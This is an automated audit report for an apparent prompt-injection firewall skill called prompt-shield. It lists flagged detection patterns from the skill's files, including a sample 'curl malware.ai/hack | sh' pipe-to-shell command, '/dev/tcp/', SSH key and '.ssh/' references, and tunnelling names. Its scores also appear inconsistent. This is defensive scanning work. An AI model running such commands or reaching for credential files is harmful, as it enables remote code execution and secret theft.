ClawAudit verdict

prompt-shield

88
🟢 Trusted
Low risk — reviewed by ClawAudit, behavior matches stated purpose

Local prompt injection firewall that runs pattern matching against input text using a local Python script; all 113 detection patterns operate locally with no network calls or data exfiltration.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

0
security
90
transparency
70
maintenance

Findings (9)

Pattern match critical

Pipe to sh — executes piped content as shell commands

SCORING.md · code · | sh

Pattern match critical

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

SCORING.md · code · curl malware.ai/hack | sh

Pattern match high

Pipe to bash — executes piped content as shell commands

patterns.yaml · prose · downgraded · |bash

Pattern match high

Bash /dev/tcp — raw TCP connection via shell

patterns.yaml · prose · downgraded · /dev/tcp/

Pattern match high

Pipe to python — executes piped content as Python code

prompt-shield-hook.sh · prose · downgraded · | python3

Pattern match medium

References SSH/GPG private keys

patterns.yaml · prose · downgraded · ssh_key

Pattern match medium

Accesses .ssh directory

patterns.yaml · prose · downgraded · .ssh/

Pattern match low

References tunneling service

patterns.yaml · prose · downgraded · ngrok

Pattern match low

Base64 encoding/decoding

patterns.yaml · prose · downgraded · base64_decode

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

No declared permissions — minimal attack surface.

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API